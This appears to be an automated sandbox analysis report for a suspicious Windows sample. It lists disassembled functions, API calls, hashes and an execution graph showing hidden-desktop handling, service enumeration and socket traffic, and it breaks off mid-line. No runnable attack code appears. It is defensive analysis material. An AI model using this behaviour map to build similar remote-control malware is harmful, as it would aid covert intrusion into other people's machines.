                                                    • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                    APIs
                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                    • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@TextWindow$Length
                                                    • String ID:
                                                    • API String ID: 2308334395-0
                                                    • Opcode ID: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
                                                    • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                    • Opcode Fuzzy Hash: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
                                                    • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                    APIs
                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                    • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                    • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CreateFontIndirectItemMessageObjectSend
                                                    • String ID:
                                                    • API String ID: 2001801573-0
                                                    • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                    • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                    • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                    • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00401D92
                                                    • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ClientScreen$ParentRectWindow
                                                    • String ID:
                                                    • API String ID: 2099118873-0
                                                    • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                    • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                    • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                    • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: (nA${D@
                                                    • API String ID: 613200358-2741945119
                                                    • Opcode ID: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                    • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                    • Opcode Fuzzy Hash: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                    • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                    APIs
                                                      • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                      • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                      • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                      • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@$??3@$memmove
                                                    • String ID: {D@
                                                    • API String ID: 4294387087-1160549682
                                                    • Opcode ID: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                    • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                    • Opcode Fuzzy Hash: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                    • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: _wtol
                                                    • String ID: GUIFlags$^L@
                                                    • API String ID: 2131799477-2609156739
                                                    • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                    • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                    • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                    • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@wsprintf
                                                    • String ID: (%d%s)
                                                    • API String ID: 3815514257-2087557067
                                                    • Opcode ID: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                    • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                    • Opcode Fuzzy Hash: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                    • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                    • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: TextWindow$Length
                                                    • String ID: t1@
                                                    • API String ID: 1006428111-473456572
                                                    • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                    • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                    • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                    • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 7-Zip SFX$Could not allocate memory
                                                    • API String ID: 2030045667-3806377612
                                                    • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                    • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                    • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                    • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                    Execution Graph

                                                    Execution Coverage:3.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:21.3%
                                                    Total number of Nodes:1041
                                                    Total number of Limit Nodes:50
                                                    execution_graph 23031 7ff7d5947ac0 10 API calls _RunAllParam 23032 7ff7d595f8c0 72 API calls _getdrive 23033 7ff7d59592c0 119 API calls _RunAllParam 23036 7ff7d59522c0 114 API calls 5 library calls 23040 7ff7d59400d0 88 API calls 2 library calls 23042 7ff7d59328d0 81 API calls 23043 7ff7d5958ed0 127 API calls _getdrive 22683 7ff7d59536d0 SetErrorMode 22684 7ff7d5953734 22683->22684 22685 7ff7d5933730 _RunAllParam 89 API calls 22684->22685 22686 7ff7d5953764 GetCurrentThreadId GetThreadDesktop 22685->22686 22687 7ff7d5953799 22686->22687 22806 7ff7d59533a0 22687->22806 22688 7ff7d59537b4 22689 7ff7d59539df 22688->22689 22818 7ff7d594f940 22688->22818 22693 7ff7d59e7220 _getdrive 8 API calls 22689->22693 22691 7ff7d59539ea 22692 7ff7d5933730 _RunAllParam 89 API calls 22691->22692 22699 7ff7d5953a11 22692->22699 22694 7ff7d5957ff0 22693->22694 22695 7ff7d59537ce 22834 7ff7d59e851c 22695->22834 22697 7ff7d5953825 22698 7ff7d59e92a4 __wtomb_environ 70 API calls 22697->22698 22700 7ff7d5953838 22698->22700 22704 7ff7d5957ef3 22699->22704 22855 7ff7d599d170 22699->22855 22701 7ff7d59e92a4 __wtomb_environ 70 API calls 22700->22701 22702 7ff7d5953842 22701->22702 22840 7ff7d599a320 22702->22840 22704->22689 22707 7ff7d5933730 _RunAllParam 89 API calls 22704->22707 22722 7ff7d5957f3e 22707->22722 22708 7ff7d5953a76 22710 7ff7d5933730 _RunAllParam 89 API calls 22708->22710 22709 7ff7d5953867 22712 7ff7d59e8bf4 free 70 API calls 22709->22712 22720 7ff7d5953874 22709->22720 22713 7ff7d5953a8e timeGetTime 22710->22713 22711 7ff7d59e8bf4 free 70 API calls 22711->22709 22712->22720 22714 7ff7d5953aaf 22713->22714 22859 7ff7d5995f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22714->22859 22715 7ff7d5953905 22721 7ff7d5933730 _RunAllParam 89 API calls 22715->22721 22717 7ff7d59538d0 SleepEx 22717->22689 22717->22720 22718 7ff7d5953abc 22719 7ff7d5953ac0 EnterCriticalSection 22718->22719 22725 7ff7d5953b17 _snprintf 22718->22725 22726 7ff7d5953af7 22719->22726 22720->22689 22720->22715 22720->22717 22733 7ff7d5953947 22721->22733 22866 7ff7d599ab00 95 API calls _RunAllParam 22722->22866 22727 7ff7d5953bd1 GetComputerNameA 22725->22727 22860 7ff7d594aed0 89 API calls _snprintf 22726->22860 22729 7ff7d5953c52 22727->22729 22736 7ff7d5953bec 22727->22736 22731 7ff7d5953c83 gethostname 22729->22731 22739 7ff7d5953c57 22729->22739 22730 7ff7d5953b0d LeaveCriticalSection 22730->22725 22734 7ff7d5953caf 22731->22734 22731->22739 22845 7ff7d599a290 22733->22845 22862 7ff7d5953220 71 API calls 2 library calls 22734->22862 22861 7ff7d59e8e5c 70 API calls 4 library calls 22736->22861 22738 7ff7d59539c2 22738->22689 22741 7ff7d5933730 _RunAllParam 89 API calls 22738->22741 22863 7ff7d599d710 15 API calls 22739->22863 22741->22689 22742 7ff7d5953ec4 22742->22689 22864 7ff7d599d600 14 API calls 22742->22864 22744 7ff7d5953eed 22744->22689 22745 7ff7d5933730 _RunAllParam 89 API calls 22744->22745 22746 7ff7d5953f0d EnterCriticalSection 22745->22746 22748 7ff7d59e92a4 __wtomb_environ 70 API calls 22746->22748 22749 7ff7d5953f5f CreateRectRgn 22748->22749 22750 7ff7d5953f95 DeleteObject 22749->22750 22751 7ff7d59e8bf4 free 70 API calls 22750->22751 22752 7ff7d5953faa LeaveCriticalSection 22751->22752 22865 7ff7d59c7d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 22752->22865 22807 7ff7d59533c1 22806->22807 22808 7ff7d599d170 2 API calls 22807->22808 22809 7ff7d59533cf 22808->22809 22810 7ff7d59533d3 GetLastError 22809->22810 22813 7ff7d59533f1 22809->22813 22811 7ff7d5933730 _RunAllParam 89 API calls 22810->22811 22811->22813 22812 7ff7d5933730 _RunAllParam 89 API calls 22814 7ff7d595351a 22812->22814 22815 7ff7d5933730 _RunAllParam 89 API calls 22813->22815 22816 7ff7d5953441 22813->22816 22814->22688 22815->22816 22816->22812 22817 7ff7d595349e 22816->22817 22817->22688 22827 7ff7d594f980 22818->22827 22820 7ff7d594fae6 SleepEx 22820->22827 22821 7ff7d594fb50 22833 7ff7d594fb49 22821->22833 22882 7ff7d59e8bbc 70 API calls swscanf 22821->22882 22822 7ff7d59e7220 _getdrive 8 API calls 22824 7ff7d594fc50 22822->22824 22824->22691 22824->22695 22826 7ff7d594fb8c 22832 7ff7d5933730 _RunAllParam 89 API calls 22826->22832 22826->22833 22827->22820 22827->22821 22828 7ff7d594fa11 22827->22828 22829 7ff7d594fa5e EnterCriticalSection 22827->22829 22827->22833 22867 7ff7d59e7c50 22827->22867 22873 7ff7d599d1f0 GetTickCount 22827->22873 22828->22820 22828->22827 22881 7ff7d599d890 97 API calls _RunAllParam 22828->22881 22831 7ff7d594fa91 LeaveCriticalSection 22829->22831 22831->22827 22832->22833 22833->22822 22836 7ff7d59e854e _snprintf 22834->22836 22835 7ff7d59effc8 _errno 70 API calls 22837 7ff7d59e8558 22835->22837 22836->22835 22839 7ff7d59e8563 22836->22839 22838 7ff7d59f49d4 _invalid_parameter_noinfo 17 API calls 22837->22838 22838->22839 22839->22697 22841 7ff7d599a340 FindWindowExA 22840->22841 22842 7ff7d5953856 22841->22842 22843 7ff7d599a35d GetWindowThreadProcessId GetCurrentProcessId 22841->22843 22842->22709 22842->22711 22842->22720 22843->22841 22844 7ff7d599a37c PostMessageA 22843->22844 22844->22842 22846 7ff7d599a2b0 22845->22846 22847 7ff7d599a303 22845->22847 22846->22847 22848 7ff7d599a2b9 FindWindowA 22846->22848 22851 7ff7d599a340 FindWindowExA 22847->22851 22849 7ff7d599a2dd PostMessageA 22848->22849 22850 7ff7d599a2cd 22848->22850 22849->22738 22850->22738 22852 7ff7d599a392 22851->22852 22853 7ff7d599a35d GetWindowThreadProcessId GetCurrentProcessId 22851->22853 22852->22738 22853->22851 22854 7ff7d599a37c PostMessageA 22853->22854 22854->22852 22856 7ff7d599d182 22855->22856 22857 7ff7d599d18a setsockopt 22855->22857 22856->22708 22857->22856 22858 7ff7d599d1b5 setsockopt 22857->22858 22858->22708 22859->22718 22860->22730 22861->22729 22862->22739 22863->22742 22864->22744 22866->22689 22868 7ff7d59e7c83 _snprintf 22867->22868 22869 7ff7d59effc8 _errno 70 API calls 22868->22869 22872 7ff7d59e7c98 22868->22872 22870 7ff7d59e7c8d 22869->22870 22871 7ff7d59f49d4 _invalid_parameter_noinfo 17 API calls 22870->22871 22871->22872 22872->22827 22874 7ff7d599d22f 22873->22874 22875 7ff7d599d2b6 22873->22875 22876 7ff7d599dd90 11 API calls 22874->22876 22878 7ff7d599d25f 22875->22878 22883 7ff7d599dd90 22875->22883 22880 7ff7d599d25b 22876->22880 22878->22827 22879 7ff7d599dd90 11 API calls 22879->22880 22880->22875 22880->22878 22880->22879 22881->22828 22882->22826 22887 7ff7d599de3d 22883->22887 22890 7ff7d599ddd4 22883->22890 22884 7ff7d59e7220 _getdrive 8 API calls 22886 7ff7d599dea6 22884->22886 22885 7ff7d599ddf0 select 22885->22890 22886->22878 22887->22884 22888 7ff7d599de55 __WSAFDIsSet 22889 7ff7d599de67 send 22888->22889 22888->22890 22889->22890 22890->22885 22890->22887 22890->22888 23046 7ff7d59b3ca0 75 API calls 3 library calls 22621 7ff7d59588a0 getpeername inet_ntoa 22622 7ff7d59e92a4 __wtomb_environ 70 API calls 22621->22622 22623 7ff7d5958913 22622->22623 22624 7ff7d59e7978 81 API calls 22623->22624 22625 7ff7d5958930 22624->22625 22626 7ff7d595893d InitializeCriticalSection 22625->22626 22627 7ff7d595895e 22625->22627 22637 7ff7d59c79a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 22626->22637 22629 7ff7d5958988 22627->22629 22633 7ff7d594f840 22627->22633 22630 7ff7d59e7220 _getdrive 8 API calls 22629->22630 22631 7ff7d59589c3 22630->22631 22634 7ff7d594f885 22633->22634 22638 7ff7d59c7b50 EnterCriticalSection 22634->22638 22636 7ff7d594f926 22636->22629 22637->22627 22639 7ff7d59c7b84 22638->22639 22640 7ff7d59c7b6d 22638->22640 22658 7ff7d59f285c 22639->22658 22641 7ff7d59f2950 RaiseException 22640->22641 22641->22639 22644 7ff7d59c7bc9 GetLastError 22645 7ff7d59f2950 RaiseException 22644->22645 22650 7ff7d59c7be4 22645->22650 22646 7ff7d59c7c0b 22647 7ff7d59c7c18 SetThreadPriority 22646->22647 22648 7ff7d59c7c43 ResumeThread 22647->22648 22649 7ff7d59c7c27 GetLastError 22647->22649 22652 7ff7d59c7c52 GetLastError 22648->22652 22653 7ff7d59c7c6e LeaveCriticalSection 22648->22653 22651 7ff7d59f2950 RaiseException 22649->22651 22650->22646 22650->22647 22654 7ff7d59f2950 RaiseException 22650->22654 22655 7ff7d59c7c42 22651->22655 22656 7ff7d59f2950 RaiseException 22652->22656 22653->22636 22654->22646 22655->22648 22657 7ff7d59c7c6d 22656->22657 22657->22653 22659 7ff7d59f289c 22658->22659 22660 7ff7d59f2887 22658->22660 22664 7ff7d59f32ec __wtomb_environ 70 API calls 22659->22664 22661 7ff7d59effc8 _errno 70 API calls 22660->22661 22662 7ff7d59f288c 22661->22662 22663 7ff7d59f49d4 _invalid_parameter_noinfo 17 API calls 22662->22663 22665 7ff7d59c7bb9 22663->22665 22666 7ff7d59f28b0 22664->22666 22665->22644 22665->22650 22667 7ff7d59f2920 22666->22667 22676 7ff7d59f3848 22666->22676 22668 7ff7d59e8bf4 free 70 API calls 22667->22668 22671 7ff7d59f2928 22668->22671 22671->22665 22681 7ff7d59f0008 70 API calls 2 library calls 22671->22681 22672 7ff7d59f370c __doserrno 70 API calls 22673 7ff7d59f28cc CreateThread 22672->22673 22673->22665 22675 7ff7d59f2918 GetLastError 22673->22675 22675->22667 22677 7ff7d59f37c4 __doserrno 70 API calls 22676->22677 22678 7ff7d59f3853 22677->22678 22679 7ff7d59f28bd 22678->22679 22682 7ff7d59eaf34 70 API calls 5 library calls 22678->22682 22679->22672 22681->22665 22682->22679 23050 7ff7d59654a0 109 API calls 4 library calls 23051 7ff7d5965ca0 331 API calls 4 library calls 23053 7ff7d594cca0 115 API calls 23055 7ff7d593a6b0 93 API calls 2 library calls 23057 7ff7d5943cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23058 7ff7d59434b0 13 API calls _getdrive 23062 7ff7d59634f7 10 API calls _getdrive 22574 7ff7d5939d00 22595 7ff7d59329a0 22574->22595 22576 7ff7d5939d6b 22577 7ff7d5939db3 OpenSCManagerA 22576->22577 22578 7ff7d5939de0 EnumServicesStatusA 22577->22578 22582 7ff7d5939dc9 22577->22582 22579 7ff7d5939fed CloseServiceHandle 22578->22579 22580 7ff7d5939e2b GetLastError 22578->22580 22579->22582 22580->22579 22581 7ff7d5939e3c 22580->22581 22581->22579 22585 7ff7d5939e54 EnumServicesStatusA 22581->22585 22583 7ff7d59e7220 _getdrive 8 API calls 22582->22583 22584 7ff7d593a017 22583->22584 22586 7ff7d5939fe1 _RunAllParam 22585->22586 22587 7ff7d5939e93 22585->22587 22586->22579 22587->22586 22588 7ff7d5939eac OpenServiceA 22587->22588 22588->22586 22589 7ff7d5939ecb QueryServiceConfigA 22588->22589 22590 7ff7d5939fc7 CloseServiceHandle 22589->22590 22591 7ff7d5939ee5 GetLastError 22589->22591 22590->22586 22590->22587 22591->22590 22594 7ff7d5939ef4 _RunAllParam 22591->22594 22592 7ff7d5939f08 QueryServiceConfigA 22592->22594 22593 7ff7d59329a0 81 API calls 22593->22594 22594->22590 22594->22592 22594->22593 22596 7ff7d5932a17 22595->22596 22599 7ff7d59329bd 22595->22599 22597 7ff7d5932a29 22596->22597 22614 7ff7d59e70b4 71 API calls std::exception::exception 22596->22614 22601 7ff7d5932a42 22597->22601 22615 7ff7d5933050 81 API calls std::exception::exception 22597->22615 22599->22596 22602 7ff7d59329e6 22599->22602 22601->22576 22603 7ff7d5932d12 22602->22603 22616 7ff7d59e7110 71 API calls std::exception::exception 22602->22616 22605 7ff7d5932d41 22603->22605 22606 7ff7d5932d22 22603->22606 22608 7ff7d5932d53 22605->22608 22619 7ff7d59e70b4 71 API calls std::exception::exception 22605->22619 22617 7ff7d5932fb0 71 API calls 22606->22617 22613 7ff7d5932d3c 22608->22613 22620 7ff7d5933050 81 API calls std::exception::exception 22608->22620 22609 7ff7d5932d2f 22618 7ff7d5932fb0 71 API calls 22609->22618 22613->22576 22614->22597 22615->22601 22616->22603 22617->22609 22618->22613 22619->22608 22620->22613 23063 7ff7d593f700 280 API calls 2 library calls 23064 7ff7d5942d00 24 API calls 23065 7ff7d5960700 9 API calls 23066 7ff7d5965100 82 API calls 2 library calls 23068 7ff7d5954003 195 API calls 2 library calls 23071 7ff7d5943110 73 API calls 2 library calls 23069 7ff7d593a910 99 API calls _RunAllParam 23070 7ff7d5939910 11 API calls _getdrive 23072 7ff7d5940310 73 API calls free 23073 7ff7d5935910 13 API calls _getdrive 23074 7ff7d595ab10 96 API calls 2 library calls 21894 7ff7d5954cdb 22106 7ff7d599d890 97 API calls _RunAllParam 21894->22106 21896 7ff7d5954cfc 21897 7ff7d5954d52 21896->21897 21956 7ff7d5980650 21896->21956 22107 7ff7d595f010 SetEvent 21897->22107 21901 7ff7d5957c95 21903 7ff7d5957cf7 21901->21903 21904 7ff7d5957ca6 FlushFileBuffers 21901->21904 21902 7ff7d5957c81 Sleep 21902->21901 21905 7ff7d5957d08 FlushFileBuffers 21903->21905 21906 7ff7d5957d59 21903->21906 21904->21903 21907 7ff7d5957ce6 CloseHandle 21904->21907 21905->21906 21909 7ff7d5957d48 CloseHandle 21905->21909 22109 7ff7d599a3b0 93 API calls 2 library calls 21906->22109 21907->21903 21908 7ff7d5954003 21914 7ff7d59531b0 27 API calls 21908->21914 21917 7ff7d5962220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 21908->21917 21922 7ff7d595c590 16 API calls 21908->21922 21926 7ff7d595419d GetTickCount 21908->21926 21936 7ff7d599d440 16 API calls 21908->21936 21937 7ff7d5933730 89 API calls _RunAllParam 21908->21937 21940 7ff7d5957c72 21908->21940 21943 7ff7d599d890 97 API calls 21908->21943 21945 7ff7d5957c47 CloseDesktop 21908->21945 21947 7ff7d59540bf CloseDesktop 21908->21947 22098 7ff7d599a5b0 98 API calls 2 library calls 21908->22098 22099 7ff7d5933730 21908->22099 22103 7ff7d599a3b0 93 API calls 2 library calls 21908->22103 22104 7ff7d59995d0 EnterCriticalSection LeaveCriticalSection 21908->22104 22105 7ff7d595c6f0 18 API calls _RunAllParam 21908->22105 22108 7ff7d595c4e0 93 API calls _RunAllParam 21908->22108 21909->21906 21912 7ff7d5957d62 21913 7ff7d5957d85 21912->21913 22110 7ff7d5962170 16 API calls 21912->22110 21916 7ff7d5957d9d CloseDesktop 21913->21916 21921 7ff7d5957dbc 21913->21921 21914->21908 21918 